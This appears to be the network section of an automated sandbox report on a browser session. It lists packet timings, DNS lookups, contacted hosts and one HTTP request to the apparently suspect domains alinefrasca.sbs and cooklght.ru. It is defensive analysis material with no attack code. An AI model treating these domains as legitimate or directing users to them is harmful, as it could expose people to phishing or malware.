                                                                            Oct 28, 2024 09:37:31.333605051 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.333614111 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:31.333787918 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.333875895 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.333899021 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:31.334001064 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.334021091 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.334028006 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:31.334069967 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.334079027 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:31.628251076 CET49962443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:31.628313065 CET4434996213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.068007946 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.068617105 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.068675995 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.068706989 CET4434996513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.068974972 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.068984032 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.068990946 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.069003105 CET4434996513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.069464922 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.069482088 CET4434996513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.085978031 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.086353064 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.086374044 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.086894989 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.086899996 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.087471962 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.088068008 CET49964443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.088087082 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.088243961 CET49964443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.088249922 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.092053890 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.092356920 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.092381001 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.092767954 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.092772007 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.197869062 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.197923899 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.197997093 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.198019028 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.198052883 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.198218107 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.198241949 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.198256969 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.198256969 CET49966443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.198266029 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.198273897 CET4434996613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.198699951 CET4434996513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.199441910 CET4434996513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.199606895 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.199608088 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.199608088 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201394081 CET49970443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201406956 CET49969443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201432943 CET4434997013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.201498985 CET4434996913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.201553106 CET49970443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201596975 CET49969443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201713085 CET49969443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201731920 CET4434996913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.201832056 CET49970443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.201843023 CET4434997013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.216454983 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.216481924 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.216525078 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.216662884 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.216695070 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.216696024 CET49968443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.216706038 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.216713905 CET4434996813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.218975067 CET49971443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.219057083 CET4434997113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.219196081 CET49971443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.219264984 CET49971443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.219281912 CET4434997113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.219814062 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.219974041 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220050097 CET49964443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.220139980 CET49964443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.220151901 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220180988 CET49964443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.220186949 CET4434996413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220721006 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220791101 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220892906 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.220932961 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.221064091 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.221064091 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222315073 CET49967443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222315073 CET49972443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222340107 CET4434996713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.222357988 CET4434997213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.222560883 CET49972443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222560883 CET49972443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222584963 CET4434997213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.222836971 CET49973443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.222853899 CET4434997313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.222985029 CET49973443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.223092079 CET49973443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.223098993 CET4434997313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:32.503076077 CET49965443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:32.503098011 CET4434996513.107.246.45192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 28, 2024 09:36:09.132900953 CET53500261.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:09.135499954 CET53565991.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:10.177998066 CET5731553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:10.178395033 CET5793553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:10.185441017 CET53573151.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:10.186322927 CET53579351.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:10.393420935 CET5555253192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:10.393604994 CET5519453192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:10.407635927 CET53551941.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:10.411276102 CET53555521.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:10.710304976 CET53499601.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:12.213237047 CET6024453192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:12.216300011 CET5164953192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:12.221005917 CET53602441.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:12.223892927 CET53516491.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:15.976371050 CET6126053192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:15.976995945 CET5736053192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:15.983802080 CET53612601.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:15.984637022 CET53573601.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:16.540390015 CET5635953192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:16.540693045 CET4972253192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:16.547934055 CET53563591.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:16.547981977 CET53497221.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:19.622370005 CET6054653192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:19.622526884 CET5468853192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:19.629750967 CET53605461.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:19.629868984 CET53546881.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:22.216387987 CET138138192.168.2.4192.168.2.255
                                                                            Oct 28, 2024 09:36:28.277456999 CET53516591.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:36.765821934 CET5209853192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:36.772193909 CET5644253192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:36.773507118 CET53520981.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:36.779622078 CET53564421.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:38.462204933 CET5660753192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:38.462349892 CET6298153192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:38.484373093 CET6223653192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:38.485152006 CET6025553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:38.491884947 CET53622361.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:38.492371082 CET53602551.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:38.555181026 CET53629811.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:38.746475935 CET53566071.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:42.976495981 CET5543053192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:42.976721048 CET5811553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:43.091865063 CET6349553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:43.092037916 CET5319853192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:36:43.099612951 CET53531981.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:43.099972963 CET53634951.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:43.433424950 CET53554301.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:43.433470011 CET53581151.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:36:47.487135887 CET53578951.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:02.350474119 CET6065553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:02.350749969 CET5075353192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:02.445765972 CET53606551.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:02.479137897 CET53507531.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:03.561553001 CET5610453192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:03.561697006 CET6156053192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:03.562165976 CET6097753192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:03.562362909 CET5729553192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:03.569346905 CET53615601.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:03.569434881 CET53609771.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:03.569458961 CET53572951.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:06.801995993 CET53587591.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:08.813148975 CET53570651.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:10.440361977 CET53579291.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:19.629271984 CET5301853192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:19.629429102 CET6302153192.168.2.41.1.1.1
                                                                            Oct 28, 2024 09:37:19.636811018 CET53530181.1.1.1192.168.2.4
                                                                            Oct 28, 2024 09:37:19.636823893 CET53630211.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Oct 28, 2024 09:37:02.479206085 CET192.168.2.41.1.1.1c275(Port unreachable)Destination Unreachable
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 28, 2024 09:36:10.177998066 CET192.168.2.41.1.1.10x2d8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.178395033 CET192.168.2.41.1.1.10xe134Standard query (0)www.google.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.393420935 CET192.168.2.41.1.1.10x2ceeStandard query (0)alinefrasca.sbsA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.393604994 CET192.168.2.41.1.1.10xc2e2Standard query (0)alinefrasca.sbs65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:12.213237047 CET192.168.2.41.1.1.10x1fa4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:12.216300011 CET192.168.2.41.1.1.10xc5adStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:15.976371050 CET192.168.2.41.1.1.10x3190Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:15.976995945 CET192.168.2.41.1.1.10x1d8Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:16.540390015 CET192.168.2.41.1.1.10x6282Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:16.540693045 CET192.168.2.41.1.1.10xc629Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:19.622370005 CET192.168.2.41.1.1.10xe545Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:19.622526884 CET192.168.2.41.1.1.10x4210Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:36.765821934 CET192.168.2.41.1.1.10x9692Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:36.772193909 CET192.168.2.41.1.1.10x350eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.462204933 CET192.168.2.41.1.1.10x32c0Standard query (0)cooklght.ruA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.462349892 CET192.168.2.41.1.1.10x66c3Standard query (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.484373093 CET192.168.2.41.1.1.10xba46Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.485152006 CET192.168.2.41.1.1.10x873cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:42.976495981 CET192.168.2.41.1.1.10xd824Standard query (0)cooklght.ruA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:42.976721048 CET192.168.2.41.1.1.10x22f4Standard query (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.091865063 CET192.168.2.41.1.1.10x9fc8Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.092037916 CET192.168.2.41.1.1.10x991fStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:02.350474119 CET192.168.2.41.1.1.10xceeeStandard query (0)cooklght.ruA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:02.350749969 CET192.168.2.41.1.1.10x765dStandard query (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.561553001 CET192.168.2.41.1.1.10x2cb9Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.561697006 CET192.168.2.41.1.1.10xbfd4Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.562165976 CET192.168.2.41.1.1.10x3450Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.562362909 CET192.168.2.41.1.1.10x74cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:19.629271984 CET192.168.2.41.1.1.10x1941Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:19.629429102 CET192.168.2.41.1.1.10x4e97Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 28, 2024 09:36:10.185441017 CET1.1.1.1192.168.2.40x2d8No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.186322927 CET1.1.1.1192.168.2.40xe134No error (0)www.google.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.407635927 CET1.1.1.1192.168.2.40xc2e2No error (0)alinefrasca.sbs65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.411276102 CET1.1.1.1192.168.2.40x2ceeNo error (0)alinefrasca.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:10.411276102 CET1.1.1.1192.168.2.40x2ceeNo error (0)alinefrasca.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:12.221005917 CET1.1.1.1192.168.2.40x1fa4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:12.221005917 CET1.1.1.1192.168.2.40x1fa4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:12.223892927 CET1.1.1.1192.168.2.40xc5adNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:15.983802080 CET1.1.1.1192.168.2.40x3190No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:15.983802080 CET1.1.1.1192.168.2.40x3190No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:15.984637022 CET1.1.1.1192.168.2.40x1d8No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:16.547934055 CET1.1.1.1192.168.2.40x6282No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:16.547934055 CET1.1.1.1192.168.2.40x6282No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:16.547981977 CET1.1.1.1192.168.2.40xc629No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:19.629750967 CET1.1.1.1192.168.2.40xe545No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:25.420834064 CET1.1.1.1192.168.2.40x55d9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:25.420834064 CET1.1.1.1192.168.2.40x55d9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:36.773507118 CET1.1.1.1192.168.2.40x9692No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:36.773507118 CET1.1.1.1192.168.2.40x9692No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:36.779622078 CET1.1.1.1192.168.2.40x350eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.491884947 CET1.1.1.1192.168.2.40xba46No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.491884947 CET1.1.1.1192.168.2.40xba46No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.492371082 CET1.1.1.1192.168.2.40x873cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.555181026 CET1.1.1.1192.168.2.40x66c3No error (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.746475935 CET1.1.1.1192.168.2.40x32c0No error (0)cooklght.ru104.21.91.145A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:38.746475935 CET1.1.1.1192.168.2.40x32c0No error (0)cooklght.ru172.67.222.24A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099612951 CET1.1.1.1192.168.2.40x991fNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099972963 CET1.1.1.1192.168.2.40x9fc8No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099972963 CET1.1.1.1192.168.2.40x9fc8No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099972963 CET1.1.1.1192.168.2.40x9fc8No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099972963 CET1.1.1.1192.168.2.40x9fc8No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.099972963 CET1.1.1.1192.168.2.40x9fc8No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.433424950 CET1.1.1.1192.168.2.40xd824No error (0)cooklght.ru104.21.91.145A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.433424950 CET1.1.1.1192.168.2.40xd824No error (0)cooklght.ru172.67.222.24A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.433470011 CET1.1.1.1192.168.2.40x22f4No error (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.699665070 CET1.1.1.1192.168.2.40xa3a5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:43.699665070 CET1.1.1.1192.168.2.40xa3a5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:59.340038061 CET1.1.1.1192.168.2.40xedafNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:36:59.340038061 CET1.1.1.1192.168.2.40xedafNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:02.445765972 CET1.1.1.1192.168.2.40xceeeNo error (0)cooklght.ru104.21.91.145A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:02.445765972 CET1.1.1.1192.168.2.40xceeeNo error (0)cooklght.ru172.67.222.24A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:02.479137897 CET1.1.1.1192.168.2.40x765dNo error (0)cooklght.ru65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.568916082 CET1.1.1.1192.168.2.40x2cb9No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.569346905 CET1.1.1.1192.168.2.40xbfd4No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.569434881 CET1.1.1.1192.168.2.40x3450No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.569434881 CET1.1.1.1192.168.2.40x3450No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:03.569458961 CET1.1.1.1192.168.2.40x74cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Oct 28, 2024 09:37:19.636811018 CET1.1.1.1192.168.2.40x1941No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:22.528657913 CET1.1.1.1192.168.2.40x632cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 28, 2024 09:37:22.528657913 CET1.1.1.1192.168.2.40x632cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                            • alinefrasca.sbs
                                                                            • https:
                                                                              • challenges.cloudflare.com
                                                                              • cdnjs.cloudflare.com
                                                                              • cooklght.ru
                                                                              • cdn.jsdelivr.net
                                                                            • fs.microsoft.com
                                                                            • a.nel.cloudflare.com
                                                                            • otelrules.azureedge.net
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449738188.114.97.34431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:11 UTC664OUTGET /pktcr/ HTTP/1.1
                                                                            Host: alinefrasca.sbs
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
